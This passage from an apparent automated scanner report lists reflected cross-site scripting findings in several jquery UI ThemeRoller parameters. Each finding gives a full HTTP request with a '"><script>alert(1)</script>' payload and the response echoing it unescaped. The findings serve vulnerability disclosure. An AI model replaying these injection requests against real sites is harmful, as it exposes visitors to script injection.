D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=0000008f2b5"><script>alert(1)</script>576b6389ccd&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&
...[SNIP]...

3.20. http://jqueryui.com/themeroller/ [bgColorShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ded7"><script>alert(1)</script>e2d451684 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD4ded7"><script>alert(1)</script>e2d451684&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120316

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
at.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD4ded7"><script>alert(1)</script>e2d451684&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.21. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11a4e"><script>alert(1)</script>52f07625338 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=10011a4e"><script>alert(1)</script>52f07625338&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=10011a4e"><script>alert(1)</script>52f07625338&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333
...[SNIP]...

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995ba"><script>alert(1)</script>4c057cb328e was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100995ba"><script>alert(1)</script>4c057cb328e&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
DD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100995ba"><script>alert(1)</script>4c057cb328e&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconCo
...[SNIP]...

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ebc5"><script>alert(1)</script>eac71f79849 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=502ebc5"><script>alert(1)</script>eac71f79849&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=502ebc5"><script>alert(1)</script>eac71f79849&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=F
...[SNIP]...

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d26"><script>alert(1)</script>9819ffd82a was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100f7d26"><script>alert(1)</script>9819ffd82a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100f7d26"><script>alert(1)</script>9819ffd82a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png
...[SNIP]...

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0704"><script>alert(1)</script>a3a7395d188 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20f0704"><script>alert(1)</script>a3a7395d188&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20f0704"><script>alert(1)</script>a3a7395d188&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=6
...[SNIP]...

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5a"><script>alert(1)</script>8c485dccd0a was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=203af5a"><script>alert(1)</script>8c485dccd0a&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=203af5a"><script>alert(1)</script>8c485dccd0a&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B100
...[SNIP]...

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c33d8"><script>alert(1)</script>f1bc2116d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50c33d8"><script>alert(1)</script>f1bc2116d7&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50c33d8"><script>alert(1)</script>f1bc2116d7&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055
...[SNIP]...

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b50"><script>alert(1)</script>5a9fde23895 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=034b50"><script>alert(1)</script>5a9fde23895&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
